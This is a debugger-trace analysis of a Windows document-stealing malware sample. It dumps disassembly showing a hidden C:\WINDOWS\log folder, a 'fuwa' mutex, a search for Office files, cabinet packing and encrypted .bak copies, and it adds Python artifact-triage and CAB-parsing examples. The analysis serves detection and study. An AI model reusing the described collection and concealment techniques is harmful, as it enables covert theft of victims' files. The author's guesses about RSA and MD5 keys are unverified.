
0040DE17 |. 5>POP EBX

0040DE18 |. 6>MOV DWORD PTR FS:[0],ECX

0040DE1F |. 8>ADD ESP,274

0040DE25 \. C>RETN

Looking into it :

00413FFE |. F>PUSH DWORD PTR SS:[ESP+10]

00414002 |. F>PUSH DWORD PTR SS:[ESP+10]

00414006 |. F>PUSH DWORD PTR SS:[ESP+10]

0041400A |. E>CALL driver.00418425

009BF5A8 009BF908 ASCII “C:\WINDOWS\log\20111118154544.cab”

009BF5AC 00425CC4 ASCII “rb”

009BF5B0 00000040

AT :

00425CBD 62 2B 00 2A 2E 2A 00 72 b+.*.*.r

00425CC5 62 00 00 63 7C 77 7B F2 b..c|w{ò

Eax contains 62 :

004184F7 |> 8>|SUB EAX,62

004184FA |. 7>|JE SHORT driver.00418544

004184FC |. 4>|DEC EAX

sets at eax=40

Stack check for EBP :

$ ==> 0>/009BF5A0

$+4 0>|00418569 RETURN to driver.00418569 from driver.004128E6

$+8 0>|009BF908 ASCII “C:\WINDOWS\log\20111118154544.cab”

$+C 0>|00008000

$+10 0>|00000040

$+14 0>|000001A4

$+18 0>|009BF720

$+1C 0>|7C822BB7 RETURN to kernel32.WritePrivateProfileStringA

$+20 0>|7C822A54 kernel32.GetPrivateProfileStringA

$+24 0>|00000000

$+28 0>|00000000

$+2C 0>0000000

009BF580 00428F90 driver.00428F90

009BF584 009BF641

009BF588 7FFFFFDA

009BF58C 009BF61C ASCII “C:\WINDOWS\log\20111118154544.cab.bak”

009BF590 00000042

004132C9 |. E>CALL driver.004165AD

004132CE |. 8>ADD ESP,0C

004132D1 |. F>DEC DWORD PTR SS:[EBP-1C]

004132D4 |. 8>MOV ESI,EAX

004132D6 |. 7>JS SHORT driver.004132E0

Proceeds to :

00413FFE |. F>PUSH DWORD PTR SS:[ESP+10]

00414002 |. F>PUSH DWORD PTR SS:[ESP+10]

00414006 |. F>PUSH DWORD PTR SS:[ESP+10]

0041400A |. E>CALL driver.00418425

00412A7F |> 6>PUSH 0 ; /hTemplateFile = NULL

00412A81 |. 5>PUSH ESI ; |Attributes

00412A82 |. F>PUSH DWORD PTR SS:[EBP-8] ; |Mode

00412A85 |. 8>LEA EAX,DWORD PTR SS:[EBP-1C] ; |

00412A88 |. 5>PUSH EAX ; |pSecurity

00412A89 |. F>PUSH DWORD PTR SS:[EBP-10] ; |ShareMode

00412A8C |. F>PUSH DWORD PTR SS:[EBP-C] ; |Access

00412A8F |. F>PUSH DWORD PTR SS:[EBP+8] ; |FileName

00412A92 |. F>CALL DWORD PTR DS:[<&KERNEL32.CreateFileA>] ; \CreateFileA

009BF530 009BF61C |FileName = “C:\WINDOWS\log\20111118154544.cab.bak”

009BF534 40000000 |Access = GENERIC_WRITE

009BF538 00000003 |ShareMode = FILE_SHARE_READ|FILE_SHARE_WRITE

009BF53C 009BF558 |pSecurity = 009BF558

009BF540 00000002 |Mode = CREATE_ALWAYS

009BF544 00000080 |Attributes = NORMAL

009BF548 00000000 \hTemplateFile = NULL

009BF54C 004265C2 driver.004265C2

At this point a *.cab.bak file with the same name as the original file is created in the filesystem at 0 KB size (initialization).
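The artifacts named so far (the HIDDEN|SYSTEM C:\WINDOWS\log directory, the YYYYMMDDHHMMSS.cab files inside it, and the .cab.bak copies that no longer start with the MSCF signature) lend themselves to a simple host triage. The following is an added Python example, not code from the original analysis; it runs over a constructed inventory of (path, attribute mask, first bytes) tuples instead of a live filesystem so it executes anywhere, and the head bytes for the .bak entry are copied from the encrypted buffer dumped in this analysis.

```python
import re
from datetime import datetime

FILE_ATTRIBUTE_HIDDEN = 0x02
FILE_ATTRIBUTE_SYSTEM = 0x04
FILE_ATTRIBUTE_DIRECTORY = 0x10

LOG_DIR = "c:\\windows\\log"
# C:\WINDOWS\log\YYYYMMDDHHMMSS.cab, optionally carrying the .bak suffix added by the .bak routine
CAB_NAME = re.compile(r"^c:\\windows\\log\\(\d{14})\.cab(\.bak)?$", re.IGNORECASE)

# Constructed inventory: (path, attribute mask, first bytes of the file, or b"" for a directory).
INVENTORY = [
    ("C:\\WINDOWS\\log", 0x16, b""),                                                        # DIRECTORY|HIDDEN|SYSTEM
    ("C:\\WINDOWS\\log\\20111118154544.cab.bak", 0x20, b"\xfd\xea\xfa\xc3\xc9\xdd\xbc\xa8"),  # encrypted .bak
    ("C:\\WINDOWS\\log\\20111118135515.cab", 0x20, b"MSCF\x00\x00\x00\x00"),                  # cleartext cabinet
    ("C:\\WINDOWS\\log\\20111399999999.cab", 0x20, b"MSCF"),                                  # 14 digits, not a date
    ("C:\\WINDOWS\\system32\\drivers\\etc\\hosts", 0x20, b"# Copyright"),
    ("C:\\Temp\\archive.cab", 0x20, b"MSCF"),                                                # cabinet outside the log dir
]


def valid_stamp(stamp):
    """True when the 14-digit name parses as a real YYYYMMDDHHMMSS timestamp."""
    try:
        datetime.strptime(stamp, "%Y%m%d%H%M%S")
        return True
    except ValueError:
        return False


def triage(inventory):
    """Return (path, verdict) pairs for entries matching the worm's on-disk artifact pattern."""
    findings = []
    for path, attrs, head in inventory:
        lowered = path.lower()
        if lowered == LOG_DIR and attrs & FILE_ATTRIBUTE_DIRECTORY:
            if attrs & FILE_ATTRIBUTE_HIDDEN and attrs & FILE_ATTRIBUTE_SYSTEM:
                findings.append((path, "log directory with HIDDEN|SYSTEM attributes"))
            continue
        m = CAB_NAME.match(lowered)
        if not m or not valid_stamp(m.group(1)):
            continue
        is_bak = m.group(2) is not None
        has_magic = head[:4] == b"MSCF"
        if is_bak:
            verdict = "cleartext .cab.bak" if has_magic else "encrypted or empty .cab.bak (no MSCF header)"
        else:
            verdict = "timestamp-named cabinet in log directory" if has_magic else "timestamp-named .cab without MSCF header"
        findings.append((path, verdict))
    return findings


if __name__ == "__main__":
    for path, verdict in triage(INVENTORY):
        print("%-45s %s" % (path, verdict))
```

The timestamp check matters because a 14-digit name alone is a weak indicator; requiring it to decode as a real date keeps the pattern tied to the GetLocalTime-derived naming seen in the disassembly.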

Further :

009BF73C FD EA FA C3 C9 DD BC A8 ýêúÃÉݼ¨

009BF744 8A 55 37 C6 DB 62 CD EF ŠU7ÆÛbÍï

009BF75C FD EA FA C3 C9 DD BC A8 ýêúÃÉݼ¨

009BF764 8A 55 37 C6 DB 62 CD EF ŠU7ÆÛbÍï

from below :

0040109B |> 8>/MOV CL,BYTE PTR DS:[EAX-20]

0040109E |. 4>|INC EDI

0040109F |. 8>|MOV BYTE PTR DS:[EAX],CL

004010A1 |. 8>|MOV DL,BYTE PTR DS:[EAX-1F]

004010A4 |. 8>|MOV BYTE PTR DS:[EAX+1],DL

004010A7 |. 8>|MOV CL,BYTE PTR DS:[EAX-1E]

004010AA |. 8>|MOV BYTE PTR DS:[EAX+2],CL

004010AD |. 8>|MOV DL,BYTE PTR DS:[EAX-1D]

004010B0 |. 8>|MOV BYTE PTR DS:[EAX+3],DL

004010B3 |. 8>|MOV ECX,DWORD PTR DS:[ESI+14]

004010B6 |. 8>|ADD EAX,4

004010B9 |. 3>|CMP EDI,ECX

004010BB |.^7>\JL SHORT driver.0040109B


The loop above generates a particular sequence of 16-byte keys, ostensibly MD5 or a public key for the encryption/decryption routines. This needs cryptanalysis, and interested parties can analyse it thoroughly in their own time.


Data is decrypted right after the particular loop described above. This would ostensibly be the embedded doc files at one intermediate layer of decryption. The reasoning is that the RSA encryption requires a private key as well, hence brute forcing would be the only option at this point in practical terms, which is infeasible if the private key is longer than 8 bytes.

Another interesting thing I observed is that specially named files – Naval Cooperation.doc and Survey.doc – are dropped and packed as .cab files as well. In the recursive search through the filesystem directories it DOES NOT infect any other file, but searches for these two files and builds a .cab file for each of them, indicating that a particular match is required. Since the filename strings are not visible anywhere in memory during this particular operation, I surmise that it reads the filesystem names, computes a hash, and compares this hash with the ones embedded in the decrypted code. All of this can be replicated by going through the session as described. Interested parties can analyse and document the rest in their own time.


Recursive searching through one of the many goat .doc/.docx/.ppt/.pptx files. It does NOT process them.

Thus in the end we have the main cab file containing ‘alldetails.txt’, broken into .bak files, as well as the cab backups of these two exploit docs.

Further :

RSA encrypted :

009BF75C FD EA FA C3 C9 DD BC A8 ýêúÃÉݼ¨

009BF764 8A 55 37 C6 DB 62 CD EF ŠU7ÆÛbÍï

009BF76C 56 57 25 7A 9F 8A 99 D2 VW%zŸŠ™Ò

009BF774 15 DF AE 14 CE BD 63 FB ߮νcû

009BF77C 2E AC 2A F1 B1 26 B3 23 .¬*ñ±&³#

009BF784 A4 F9 1D 37 6A 44 7E CC ¤ù7jD~Ì

009BF78C 31 5F 61 F3 80 79 D2 D0 1_aó€yÒÐ

009BF794 24 80 CF E7 4E C4 B1 2B $€ÏçNı+

009BF79C 25 97 90 DC A5 EE 42 0C %—Ü¥îB.

009BF7A4 81 6E 8D EB CF AA 3C C0 nëϪ<À

009BF7AC 99 7C 2A 56 3C 92 68 5A ™|*V<’hZ

009BF7B4 BD FC E5 B1 72 56 D9 71 ½üå±rVÙq

009BF7BC 08 49 89 16 34 DB E1 4C I‰4ÛáL

009BF7C4 89 27 04 FD FB 71 DD 8C ‰’ýûqÝŒ

009BF7CC EB 88 ED 19 DF 53 0C 55 ëˆíßS.U

009BF7D4 56 74 08 A8 AD 05 D5 24 Vt¨­Õ$

009BF7DC 00 8B DB 8C DF D8 D7 D9 .‹ÛŒßØ×Ù

009BF7E4 89 AC DF 71 24 A9 0A 55 ‰¬ßq$©.U

009BF7EC C8 EC 27 BA 17 34 F0 63 Èì’º4ðc

009BF7F4 9E 98 2F 12 BA 31 25 47 ž˜/º1%G

009BF7FC 39 D3 87 4E 2E E7 77 2D 9Ó‡N.çw-

009BF804 B0 7F 58 3F 0A 4E 7D 78 °X?.N}x

Further :

EAX 0000004D

ECX 008B2419 ASCII “SCF”

EDX 00000009

EBX 009BF5E4

ESP 009BF5A8

EBP 009BF5BC

ESI 00428F90 driver.00428F90

EDI 00000010

EIP 004141FE driver.004141FE

ECX points to MSCF – the cabinet file header signature (Microsoft Cabinet File)

008B2411 02 03 01 C1 07 18 00 4D ...Á...M

008B2419 53 43 46 00 00 00 00 C6 SCF….Æ

008B2421 07 00 00 00 00 00 00 2C ……,

008B2429 00 00 00 00 00 00 00 03 …….


008B2431 01 01 00 01 00 00 00 39 ….9

008B2439 30 00 00 4B 00 00 00 01 0..K…

008B2441 00 01 00 E4 13 00 00 00 ..ä…

008B2449 00 00 00 00 00 72 3F A9 …..r?©

008B2451 80 20 00 61 6C 6C 64 65 € .allde

008B2459 74 61 69 6C 73 2E 74 78 tails.tx

008B2461 74 00 C5 70 66 5F 73 07 t.Åpf_s

008B2469 E4 13 43 4B 95 58 5B 73 äCK•X[s

008B2471 A2 CA 16 7E B7 CA FF D0 ¢Ê~·ÊÿÐ

The unaltered cab file.
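The dump above identifies the MSCF header by eye; here is an added Python example (not code from the original analysis) that parses the fixed structures at the start of a cabinet: CFHEADER, the first CFFOLDER, the first CFFILE and the first CFDATA header. The input bytes are transcribed from the dump starting at 008B2418 up to the first two bytes of compressed data, so every parsed value can be checked against the dump; the field layout is the public Microsoft Cabinet format.

```python
import struct

# Bytes transcribed from the dump at 008B2418 (constructed input for this example; the
# cabinet continues with 1907 bytes of MSZIP data that are not reproduced here).
CAB_SAMPLE = bytes.fromhex(
    "4D534346" "00000000" "C6070000" "00000000" "2C000000" "00000000"   # sig, res1, cbCabinet, res2, coffFiles, res3
    "03" "01" "0100" "0100" "0000" "3930" "0000"                        # vMinor, vMajor, cFolders, cFiles, flags, setID, iCabinet
    "4B000000" "0100" "0100"                                            # CFFOLDER: coffCabStart, cCFData, typeCompress
    "E4130000" "00000000" "0000" "723F" "A980" "2000"                   # CFFILE: cbFile, uoffFolderStart, iFolder, date, time, attribs
    "616C6C64657461696C732E74787400"                                    # szName "alldetails.txt\0"
    "C570665F" "7307" "E413"                                            # CFDATA: csum, cbData, cbUncomp
    "434B"                                                              # first bytes of the MSZIP block ("CK")
)

COMPRESSION = {0: "NONE", 1: "MSZIP", 2: "QUANTUM", 3: "LZX"}
CFHDR_RESERVE_PRESENT = 0x0004


def dos_datetime(date, time):
    """Decode the FAT-style packed date and time words stored in CFFILE."""
    year, month, day = (date >> 9) + 1980, (date >> 5) & 0xF, date & 0x1F
    hour, minute, second = time >> 11, (time >> 5) & 0x3F, (time & 0x1F) * 2
    return "%04d-%02d-%02d %02d:%02d:%02d" % (year, month, day, hour, minute, second)


def parse_cab_head(buf):
    """Parse CFHEADER plus the first CFFOLDER, CFFILE and CFDATA header of a cabinet."""
    if len(buf) < 36 or buf[:4] != b"MSCF":
        raise ValueError("not a cabinet: missing MSCF signature")
    (_, cb_cabinet, _, coff_files, _, v_minor, v_major, c_folders, c_files,
     flags, set_id, _) = struct.unpack_from("<IIIIIBBHHHHH", buf, 4)
    off = 36
    cb_cffolder = cb_cfdata = 0
    if flags & CFHDR_RESERVE_PRESENT:      # optional per-cabinet/folder/data reserve areas
        cb_cfheader, cb_cffolder, cb_cfdata = struct.unpack_from("<HBB", buf, off)
        off += 4 + cb_cfheader
    coff_cab_start, c_cfdata, type_compress = struct.unpack_from("<IHH", buf, off)
    cb_file, _, _, date, time, attribs = struct.unpack_from("<IIHHHH", buf, coff_files)
    name_end = buf.index(b"\0", coff_files + 16)
    name = buf[coff_files + 16:name_end].decode("ascii")
    csum, cb_data, cb_uncomp = struct.unpack_from("<IHH", buf, coff_cab_start)
    return {
        "cbCabinet": cb_cabinet,
        "version": "%d.%d" % (v_major, v_minor),
        "cFolders": c_folders,
        "cFiles": c_files,
        "setID": set_id,
        "compression": COMPRESSION.get(type_compress & 0xF, "UNKNOWN"),
        "file": name,
        "cbFile": cb_file,
        "attribs": attribs,
        "timestamp": dos_datetime(date, time),
        "first_block": {"cbData": cb_data, "cbUncomp": cb_uncomp, "checksum": csum},
        # for a one-folder, one-block cabinet the header, block header and data must add up to cbCabinet
        "size_consistent": (c_folders == 1 and c_cfdata == 1
                            and coff_cab_start + 8 + cb_cfdata + cb_data == cb_cabinet),
    }


if __name__ == "__main__":
    for key, value in parse_cab_head(CAB_SAMPLE).items():
        print("%-16s %s" % (key, value))
```

Running it shows a 1990-byte, MSZIP-compressed cabinet holding the single file alldetails.txt (5092 bytes uncompressed, 1907 bytes in one data block), and the CFFILE date word decodes to 2011-11-18, the same day as the timestamp-named cabinets in C:\WINDOWS\log; the size check confirms that the one data block accounts for the whole file.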

004141FB |. 8>|CMP EAX,-1

004141FE |. 5>|POP ECX

004141FF |. 7>|JE SHORT driver.00414229

00414201 |. 8>|MOV BYTE PTR DS:[EBX],AL

00414203 |. 8>|MOV EAX,DWORD PTR DS:[ESI+18]

00414206 |. 4>|INC EBX

00414207 |. F>|DEC DWORD PTR SS:[EBP+8]

The cabinet file and its contents are seen at this point.

00401395 |. 4>|DEC EDX

00401396 |. 8>|MOV CL,BYTE PTR DS:[ECX+425090]

0040139C |. 8>|MOV BYTE PTR DS:[EAX-4],CL

0040139F |.^7>|JNZ SHORT driver.0040138E

004013A1 |. 4>|INC ESI

004013A2 |. 8>|CMP ESI,4

004013A5 |.^7>\JL SHORT driver.00401386

Hardware breakpoint on the ENCRYPTED DATA in .data

00412EC5 |> 8>LEA ECX,DWORD PTR SS:[EBP-C]

00412EC8 |. 5>PUSH EDI ; /pOverlapped

00412EC9 |. 5>PUSH ECX ; |pBytesWritten

00412ECA |. F>PUSH DWORD PTR SS:[EBP+10] ; |nBytesToWrite

00412ECD |. F>PUSH DWORD PTR SS:[EBP+C] ; |Buffer

00412ED0 |. F>PUSH DWORD PTR DS:[EAX] ; |hFile

00412ED2 |. F>CALL DWORD PTR DS:[<&KERNEL32.WriteFile>] ; \WriteFile

00412ED8 |. 8>TEST EAX,EAX

009BF164 00000060 |hFile = 00000060 (window)

009BF168 008B3430 |Buffer = 008B3430

009BF16C 000007D0 |nBytesToWrite = 7D0 (2000.)

009BF170 009BF58C |pBytesWritten = 009BF58C

009BF174 00000000 \pOverlapped = NULL

009BF178 000007D0

At the next round after .bak creation and .cab deletion :

009BF840 00000000 |Arg1 = 00000000

009BF844 008B0DB9 |Arg2 = 008B0DB9 ASCII “C:”

009BF848 00000002 |Arg3 = 00000002

009BF84C 0000001F |Arg4 = 0000001F

009BF850 7FFDEC00 |Arg5 = 7FFDEC00

009BF854 008B0D71 |Arg6 = 008B0D71 ASCII “*.doc;*.docx;*.ppt;*.pptx”

009BF858 00000019 |Arg7 = 00000019

009BF85C 0000001F \Arg8 = 0000001F

0040F76A |. 5>|PUSH EDX

0040F76B |. C>|MOV BYTE PTR SS:[ESP+758],4

0040F773 |. E>|CALL driver.004035E0

0040F778 |. 8>|LEA ECX,DWORD PTR SS:[ESP+1F8] ; |

0040F77F |. C>|MOV BYTE PTR SS:[ESP+750],3 ; |

0040F787 |. E>|CALL driver.00402270 ; \driver.00402270

009BF5DC 00402600 |Arg1 = 00402600

009BF5E0 009E0319 |Arg2 = 009E0319 ASCII “C:\426984261ed02c31d72337”

009BF5E4 00000019 |Arg3 = 00000019

009BF5E8 0000001F |Arg4 = 0000001F

009BF5EC 009BF800 |Arg5 = 009BF800

009BF5F0 008B0D71 |Arg6 = 008B0D71 ASCII “*.doc;*.docx;*.ppt;*.pptx”

009BF5F4 00000019 |Arg7 = 00000019

009BF5F8 0000001F \Arg8 = 0000001F

00402693 |. 5>|PUSH EDX

00402694 |. C>|MOV BYTE PTR SS:[ESP+268],9

0040269C |. E>|CALL driver.00405CE0

004026A1 |. 8>|ADD ESP,0C

004026A4 |. 8>|LEA ECX,DWORD PTR SS:[ESP+D8] ; |

004026AB |. C>|MOV BYTE PTR SS:[ESP+25C],8 ; |

004026B3 |. E>|CALL driver.00402270 ; \driver.00402270

004026B8 |. 8>|LEA EDX,DWORD PTR SS:[ESP+50]

At this point :

00402375 |. E>CALL driver.004048D0

0040237A |. 8>MOV EAX,DWORD PTR SS:[ESP+24]

0040237E |. C>MOV BYTE PTR SS:[ESP+23C],2

009BF254 74 2E 64 6F 63 00 00 00 t.doc…

009BF25C 00 00 00 00 00 00 00 00 ……..

009BF264 00 00 00 00 00 …..

CODE SNAPSHOTS :

00412240 /$ 8>SUB ESP,238
00412246 |. 5>PUSH EBX
00412247 |. 5>PUSH EBP
00412248 |. 5>PUSH ESI
00412249 |. 5>PUSH EDI
0041224A |. 3>XOR EAX,EAX
0041224C |. B>MOV ECX,49
00412251 |. 8>LEA EDI,DWORD PTR SS:[ESP+20]
00412255 |. C>MOV DWORD PTR SS:[ESP+1C],0
0041225D |. 5>PUSH EAX ; /ProcessID => 0
0041225E |. 6>PUSH 2 ; |Flags = TH32CS_SNAPPROCESS
00412260 |. F>REP STOS DWORD PTR ES:[EDI] ; |
00412262 |. E>CALL <JMP.&KERNEL32.CreateToolhelp32Snap>; \CreateToolhelp32Snapshot
00412267 |. 8>MOV ESI,EAX
00412269 |. 8>CMP ESI,-1
0041226C |. 8>MOV DWORD PTR SS:[ESP+14],ESI
00412270 |. 0>JE svchost.0041236F
00412276 |. 8>LEA EAX,DWORD PTR SS:[ESP+1C]
0041227A |. C>MOV DWORD PTR SS:[ESP+1C],128
00412282 |. 5>PUSH EAX ; /pProcessentry
00412283 |. 5>PUSH ESI ; |hSnapshot
00412284 |. E>CALL <JMP.&KERNEL32.Process32First> ; \Process32First
00412289 |. 8>TEST EAX,EAX
0041228B |. 0>JE svchost.0041236F
00412291 |. 8>MOV EBX,DWORD PTR SS:[ESP+24C]
00412298 |> 8>/MOV ECX,DWORD PTR SS:[ESP+24]
0041229C |. 5>|PUSH ECX ; /ProcessId
0041229D |. 6>|PUSH 0 ; |Inheritable = FALSE
0041229F |. 6>|PUSH 410 ; |Access = VM_READ|QUERY_INFORMATION
004122A4 |. F>|CALL DWORD PTR DS:[<&KERNEL32.OpenProce>; \OpenProcess
004122AA |. 8>|MOV EBP,EAX
004122AC |. 8>|TEST EBP,EBP
004122AE |. 0>|JE svchost.00412344
004122B4 |. 8>|LEA EDX,DWORD PTR SS:[ESP+18]
004122B8 |. 8>|LEA EAX,DWORD PTR SS:[ESP+10]
004122BC |. 5>|PUSH EDX
004122BD |. 6>|PUSH 4
004122BF |. 5>|PUSH EAX
004122C0 |. 5>|PUSH EBP
004122C1 |. E>|CALL <JMP.&PSAPI.EnumProcessModules>
004122C6 |. 8>|TEST EAX,EAX
004122C8 |. 7>|JE SHORT svchost.00412344
004122CA |. 8>|MOV EDX,DWORD PTR SS:[ESP+10]
004122CE |. B>|MOV ECX,41
004122D3 |. 3>|XOR EAX,EAX
004122D5 |. 8>|LEA EDI,DWORD PTR SS:[ESP+144]
004122DC |. F>|REP STOS DWORD PTR ES:[EDI]
004122DE |. 8>|LEA ECX,DWORD PTR SS:[ESP+144]
004122E5 |. 6>|PUSH 104
004122EA |. 5>|PUSH ECX
004122EB |. 5>|PUSH EDX
004122EC |. 5>|PUSH EBP
004122ED |. E>|CALL <JMP.&PSAPI.GetModuleFileNameExA>
004122F2 |. 8>|LEA ESI,DWORD PTR SS:[ESP+144]
004122F9 |. 8>|MOV EAX,EBX
004122FB |> 8>|/MOV DL,BYTE PTR DS:[EAX]
004122FD |. 8>||MOV CL,DL
004122FF |. 3>||CMP DL,BYTE PTR DS:[ESI]
00412301 |. 7>||JNZ SHORT svchost.0041231F
00412303 |. 8>||TEST CL,CL
00412305 |. 7>||JE SHORT svchost.0041231B
00412307 |. 8>||MOV DL,BYTE PTR DS:[EAX+1]
0041230A |. 8>||MOV CL,DL
0041230C |. 3>||CMP DL,BYTE PTR DS:[ESI+1]
0041230F |. 7>||JNZ SHORT svchost.0041231F
00412311 |. 8>||ADD EAX,2
00412314 |. 8>||ADD ESI,2
00412317 |. 8>||TEST CL,CL
00412319 |.^7>|\JNZ SHORT svchost.004122FB
0041231B |> 3>|XOR EAX,EAX
0041231D |. E>|JMP SHORT svchost.00412324
0041231F |> 1>|SBB EAX,EAX
00412321 |. 8>|SBB EAX,-1
00412324 |> 8>|TEST EAX,EAX
00412326 |. 7>|JNZ SHORT svchost.00412339
00412328 |. 8>|MOV EAX,DWORD PTR SS:[ESP+24]
0041232C |. 5>|PUSH EAX
0041232D |. E>|CALL svchost.004121B0
00412332 |. 8>|ADD ESP,4
00412335 |. 8>|TEST EAX,EAX
00412337 |. 7>|JNZ SHORT svchost.00412358
00412339 |> 5>|PUSH EBP ; /hObject
0041233A |. F>|CALL DWORD PTR DS:[<&KERNEL32.CloseHand>; \CloseHandle
00412340 |. 8>|MOV ESI,DWORD PTR SS:[ESP+14]
00412344 |> 8>|LEA ECX,DWORD PTR SS:[ESP+1C]
00412348 |. 5>|PUSH ECX ; /pProcessentry
00412349 |. 5>|PUSH ESI ; |hSnapshot
0041234A |. E>|CALL <JMP.&KERNEL32.Process32Next> ; \Process32Next
0041234F |. 8>|TEST EAX,EAX
00412351 |. 7>|JE SHORT svchost.00412368
00412353 |.^E>\JMP svchost.00412298
00412358 |> 5>POP EDI
00412359 |. 5>POP ESI
0041235A |. 5>POP EBP
0041235B |. B>MOV EAX,1
00412360 |. 5>POP EBX
00412361 |. 8>ADD ESP,238
00412367 |. C>RETN
00412368 |> 5>PUSH ESI ; /hObject
00412369 |. F>CALL DWORD PTR DS:[<&KERNEL32.CloseHandl>; \CloseHandle
0041236F |> 5>POP EDI
00412370 |. 5>POP ESI
00412371 |. 5>POP EBP
00412372 |. 3>XOR EAX,EAX
00412374 |. 5>POP EBX
00412375 |. 8>ADD ESP,238
0041237B \. C>RETN

Local calls from 0040BE92, 0040C192, 0040C328, 0040C435

MANUAL REDIRECTION FROM THE START :

00414526 |. F>PUSH DWORD PTR SS:[EBP-64] ; parses the command line -e (argument given)
00414529 |. 5>PUSH ESI
0041452A |. 5>PUSH ESI ; /pModule
0041452B |. F>CALL DWORD PTR DS:[<&KERNEL32.GetModuleHa>; \GetModuleHandleA

00407F2E |> 8>CMP EAX,2 ; if eax==2
00407F31 |. 7>JNZ SHORT svchost.00407FAA
00407F33 |. E>CALL svchost.004086B0 ; set RegValue and SetFileAttributes to parent file
00407F38 |. 8>MOV ECX,DWORD PTR DS:[ESI+4]
00407F3B |. 6>PUSH svchost.004255FC ; UNICODE “-m”
00407F40 |. 5>PUSH ECX
00407F41 |. E>CALL svchost.00413C7E

004255DC 2D 00 75 00 00 00 00 00 -.u…..
004255E4 2D 00 65 00 00 00 00 00 -.e…..
004255EC 2D 00 6F 00 00 00 00 00 -.o…..
004255F4 2D 00 73 00 00 00 00 00 -.s…..
004255FC 2D 00 6D 00 00 00 00 00 -.m…..

00413C93 |. 7>|JNZ SHORT svchost.00413CA3
00413C95 |. 6>|TEST CX,CX
00413C98 |. 7>|JE SHORT svchost.00413CA3
00413C9A |. 4>|INC EDX
00413C9B |. 4>|INC EDX
00413C9C |. 4>|INC ESI ; svchost.004255FC (see the dump shown above)
00413C9D |. 4>|INC ESI
00413C9E |. 6>|MOV CX,WORD PTR DS:[ESI]

At :

0040B9D0 $ 5>PUSH EBP
0040B9D1 . 8>MOV EBP,ESP
0040B9D3 . 6>PUSH -1
0040B9D5 . 6>PUSH svchost.0041FE10 ; SE handler installation
0040B9DA . 6>MOV EAX,DWORD PTR FS:[0]
0040B9E0 . 5>PUSH EAX
0040B9E1 . 6>MOV DWORD PTR FS:[0],ESP
0040B9E8 . 8>SUB ESP,224
0040B9EE . 5>PUSH EBX
0040B9EF . 5>PUSH ESI
0040B9F0 . 5>PUSH EDI
0040B9F1 . 8>MOV DWORD PTR SS:[EBP-10],ESP
0040B9F4 . 6>PUSH svchost.0042612C ; /MutexName = “fuwa”
0040B9F9 . 6>PUSH 1 ; |InitialOwner = TRUE
0040B9FB . 3>XOR EBX,EBX ; |
0040B9FD . 5>PUSH EBX ; |pSecurity => NULL
0040B9FE . F>CALL DWORD PTR DS:[<&KERNEL32.CreateMutex>; \CreateMutexA
0040BA04 . F>CALL DWORD PTR DS:[<&KERNEL32.GetLastErro>; [GetLastError
0040BA0A . 3>CMP EAX,0B7 ; 0B7 = ERROR_ALREADY_EXISTS (i.e. the program is already running); prevents more than one copy from executing
0040BA0F . 7>JNZ SHORT svchost.0040BA24 ; goes to the drive.ini setting module if EAX != 0B7
0040BA11 . 3>XOR EAX,EAX
0040BA13 . 8>MOV ECX,DWORD PTR SS:[EBP-C]
$+3C > 0040A3A5 RETURN to svchost.0040A3A5 from svchost.004130C0
$+40 > 0042A378 ASCII “C:\WINDOWS\drive.ini”
$+44 > 0042611C ASCII “%s\drive.ini”
$+48 > 0042A378 ASCII “C:\WINDOWS\drive.ini”

0040A3BB . 6>PUSH svchost.0042A170
0040A3C0 . F>CALL ESI ; kernel32.GetWindowsDirectoryA
0040A3C2 . 6>PUSH svchost.0042601C ; ASCII “log”

0040A3DB . 5>PUSH EBX
0040A3DC . 6>PUSH svchost.0042A170 ; ASCII “C:\WINDOWS\log”
0040A3E1 . E>CALL svchost.00413E46
0040A3E6 . 8>ADD ESP,18
0040A3E9 . 8>CMP EAX,-1
0040A3EC . 7>JNZ SHORT svchost.0040A407
0040A3EE . 5>PUSH EBX ; /pSecurity
0040A3EF . 6>PUSH svchost.0042A170 ; |Path = “C:\WINDOWS\log”
0040A3F4 . F>CALL DWORD PTR DS:[<&KERNEL32.CreateDirec>; \CreateDirectoryA
0040A3FA . 6>PUSH 6 ; /FileAttributes = HIDDEN|SYSTEM
0040A3FC . 6>PUSH svchost.0042A170 ; |FileName = “C:\WINDOWS\log”
0040A401 . F>CALL DWORD PTR DS:[<&KERNEL32.SetFileAttr>; \SetFileAttributesA
0040A407 > B>MOV ECX,41

0040A428 . B>MOV EDI,svchost.0042A274 ; ASCII “C:\Documents and Settings\VICTOR\Desktop\svchost.eVe”
0040A42D . 8>OR ECX,FFFFFFFF
0040A430 . 3>XOR EAX,EAX
0040A432 . F>REPNE SCAS BYTE PTR ES:[EDI]
0040A434 . F>NOT ECX
0040A436 . 4>DEC ECX
0040A437 . 8>CMP BYTE PTR DS:[ECX+42A273],5C ; chk for backslash
0040A43E . 7>JE SHORT svchost.0040A455
0040A440 . B>MOV EDX,svchost.0042A274 ; ASCII “C:\Documents and Settings\VICTOR\Desktop\svchost.eVe”
0040A445 . 4>DEC EDX
0040A446 . 8>MOV AL,BYTE PTR DS:[EDX+ECX]

0040A449 > 3>CMP AL,3A ; “:” sign
0040A44B . 7>JE SHORT svchost.0040A455
0040A44D . 4>DEC ECX
0040A44E . 8>MOV AL,BYTE PTR DS:[EDX+ECX]
0040A451 . 3>CMP AL,5C
0040A453 .^7>JNZ SHORT svchost.0040A449
0040A455 > 8>MOV BYTE PTR DS:[ECX+42A273],BL
0040A45B . 6>PUSH svchost.0042601C ; ASCII “log”
0040A460 . 6>PUSH svchost.0042A274 ; ASCII “C:\Documents and Settings\VICTOR\Desktop\svchost.eVe”
0040A465 . 6>PUSH svchost.00426108 ; ASCII “%s\%s”
0040A46A . 6>PUSH svchost.0042A274 ; ASCII “C:\Documents and Settings\VICTOR\Desktop\svchost.eVe”
0040A46F . E>CALL svchost.004130C0

$+10 > 7C80B357 kernel32.GetModuleFileNameA
$+14 > 0042A2A0 svchost.0042A2A0
$+18 > 7FFFFFD2
$+1C > 0042A274 ASCII “C:\Documents and Settings\VICTOR\Desktop\log”
$+20 > 00000042
$+24 > 0042A378 ASCII “C:\WINDOWS\drive.ini”

$+44 > 0042A274 |Path = “C:\Documents and Settings\VICTOR\Desktop\log”
$+48 > 00000000 \pSecurity = NULL

0040A487 . 5>PUSH EBX ; /pSecurity
0040A488 . 6>PUSH svchost.0042A274 ; |Path = “C:\Documents and Settings\VICTOR\Desktop\log”
0040A48D . F>CALL DWORD PTR DS:[<&KERNEL32.CreateDi>; \CreateDirectoryA

0040A493 6>PUSH 6
